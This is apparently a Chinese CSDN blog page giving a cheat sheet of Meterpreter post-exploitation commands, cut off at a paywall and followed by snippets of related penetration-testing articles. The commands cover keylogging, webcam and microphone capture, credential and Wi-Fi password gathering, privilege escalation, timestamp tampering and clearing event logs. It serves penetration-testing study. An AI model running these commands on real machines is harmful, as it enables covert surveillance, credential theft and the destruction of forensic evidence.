metepreter命令

最新推荐文章于 2024-01-26 15:41:32 发布
最新推荐文章于 2024-01-26 15:41:32 发布
阅读量1k 收藏 6
点赞数 1
分类专栏: 后渗透权限维持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunshine19871211/article/details/105515961
版权
本文详细介绍了Meterpreter后渗透阶段的各种命令,包括会话管理、文件操作、截图、摄像头控制、权限提升、系统信息获取、网络扫描、注册表操作、后门植入等。此外,还提到了如何利用内核漏洞提权、哈希传递和注册表设置nc后门等高级技巧,是渗透测试人员的重要参考资料。
摘要由CSDN通过智能技术生成

https://xz.aliyun.com/t/2536
meterpreter后渗透命令
background 将会话切换到后台
sessions -l
sessions -i 2 启动一个shell或一个meterpreter
sessions -k 2 杀死shell
upload /root/桌面/payload.txt c:
edit payload.txt
cat ls c: rmdir rm download
screenshot 截屏
webcam_list 列出所以摄像头
webcam_snap 拍照
webcam_stream 录制实时视频
file:///root/bapsdkjf.html 查看视频
record_mic 利用麦克风录制环境声音 -d 设置录制的时间(秒)
idletime 计算空闲时间,在空闲时间内发动攻击
keyscan_start
keyscan_dump
keyscan_stop
getuid
getsystem 提权
timestomp
-v 显示信息
-z 修改时间如timestomp -z “11/23/2020 15:23:34” payload.txt
-b 清除时间信息
run post/windows/wlan/wlan_bss_list 获取附近无线网络
run post/windows/wlan/wlan_profile 或却wifi密码
run get_application_list 获取应用程序列表
run post/windows/gather/credentials/ 获取这种密码
search -f *.txt *.doc 查找文件
clearev 清除所有日志
shell
reboot
sysinfo
ps
kill
getpid
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
migrate <pid值> #将Meterpreter会话移植到指定pid值进程中

ipconfig/ifconfig
netstat –ano
arp
getproxy #查看代理信息
route #查看路由

portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

run autoroute –h #查看帮助
r

最低0.47元/天 解锁文章
purpledragon9527
关注
专栏目录
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5644
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
Meterpreter命令详解
weixin_43803070的博客
07-10 1545
文章讲的比较浅显易懂,比较深奥的东西我就不写了。 0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块...
meterpreter基本命令
weixin_33953249的博客
01-20 304
screenshot :截屏,获取用户的桌面截屏 sysinfo:获取系统运行的平台 ps:获得目标系统正在运行的进程 migrate 进程号:将会话迁移到进程里面 run post/windows/capture/keylog_recorder:在进程空间下启用这个模块,获取键盘记录 除了使用键盘记录来记录登陆名和用户密码之外,还可以使用命令来获取密码哈希值 use...
meterpreter常用命令
纯心缺
11-02 1509
核心命令 =============     命令说明     ------- -----------     ?帮助菜单     background      背景当前会话     bg                       别名为背景     bgkill                 杀死背景meterpreter脚本     bglist                 列出...
Kali linux 学习笔记(九十三)metasploit framework——metepreter 2020.4.25
闵行小鱼塘
04-27 542
本节学习metepreter
metasploit学习之路(三) exploit+payload攻击载荷+metepreter(介绍)
Sea_Sand息禅
07-07 2281
一、exploit介绍 exploit是利用漏洞对目标进行攻击的模块,通过信息的手机及漏洞的验证等,使用相应的exploit对目标机进行漏洞攻击。也就是我么常说的漏洞利用exp。 exploit可有主动和被动两种。 主动:利用合适的exploit对目标机进行攻击 被动:类似于钓鱼,等待用户对我们的诱饵链接等进行操作我们才能攻击成功。 二、payload介绍 payload是msf生成的有效载荷,可...
【kali】Mestasploit——基本使用2、Exploit模块、playload、metepreter
(∪.∪ )...zzz的博客
10-27 1242
这里写自定义目录标题Exploit模块1. Active exploitpsexec2. Passive Exploits Exploit模块 1. Active exploit 攻击者主动连接受害者 payload发给受害者执行 psexec use exploit/windows/smb/psexec # 基于smb协议 # 需要目标机的权限 # 利用psexec模块 # 在132上执行该模块的payload后将shell反弹给161kali的4444端口 set RHOST 192.168.98
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
weixin_62490257的博客
06-29 4000
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
12、后渗透测试--meterpreter使用
无痕的博客
12-13 1293
metasploit后渗透阶段meterpreter命令
Meterpreter使用详解
悦分享
11-23 261
Meterpreter是一种先进的,可动态扩展的有效负载,它使用内存中的 DLL注入阶段,并在运行时通过网络扩展。它通过stager套接字进行通信并提供全面的客户端Ruby API。它包含命令历史记录,制表符完成,频道等。Metepreter最初由Metasploit 2.x的skape编写,常见的扩展名合并为3.x,目前正在对Metasploit 3.3进行大修。服务器部分以纯C实现,现在使用MSVC进行编译,使其具有一定的便携性。
Meterpreter使用总结(1)
热门推荐
CODING...
02-08 2万+
meterpreter是我最喜欢使用的攻击payload,经常都会使用windows/meterpreter/reverse_tcp作为携带的payload来进行测试,下面就meterpreter的基本使用进行一个总结:
meterpreter使用详解
lweiheng blog
01-07 4076
meterpreter使用详解 文章目录meterpreter使用详解0 meterpreter简介1 meterpreter控制技巧总结1.1 命令详解1.2 sessions 控制命令1.3 meterpreter收集信息1.3.1 meterpreter 收集windows主机信息1.3.1.1 收集系统信息1.3.1.2 收集本地(域)用户信息1.3.1.3 收集当前用户信息1.3.1.4...
【内网安全】——meterpreter使用攻略
最新发布
qq_53058639的博客
01-26 1142
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
Metasploit使用Hash直接登录Windows
jackey3Lin的专栏
10-21 2451
首先,在本地主机(假设为目标主机) 新建一个isosky用户,并为之设置密码,然后通过gethashes.exe获取到HASH C:\>net user isosky test The command completed successfully. C:\>gethashes.exe $local 1:1007:C2265B23734E0DACAAD3B435B51404
Metapsloit后渗透Windows攻击(亲测metepreter使用教程)
wanqianshao的博客
04-02 6136
Meterpreter是什么? 在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。 如何进入meterpreter? 实验环境: kali metasploit 192.168.31.135 windows7 192.168.31.160 实验步骤: msfvenom -
第四期_Metasploit 基础(六)Meterprete《Metasploit Unleashed Simplified Chinese version(Metasploit官方文档教程中文版)》
Sno_WolF的博客
02-04 1352
四、METASPLOIT 基础 6. Meterpreter Meterpreter 是一种高级的、动态可扩展的有效负载,它使用内存中的 DLL 注入stagers并在运行时通过网络扩展。它通过stager程序套接字进行通信,并提供全面的客户端 Ruby API。它具有命令历史记录,选项卡完成,通道等功能。 Metepreter最初是由skape为Metasploit 2.x编写的,常见的扩展被合并到3.x中,目前正在对Metasploit 3.3进行大修。服务器部分以纯C语言实现,现在使用MSVC编译,使
Metasploit框架详解:Metepreter模块与命令应用
1. **截图(screenshot)**:这个命令用于获取目标系统的桌面截屏,这对于了解目标系统环境、用户活动以及可能存在的敏感信息非常有用。截图文件通常会保存在攻击者的机器上,可以作为攻击证据或者进一步分析的目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值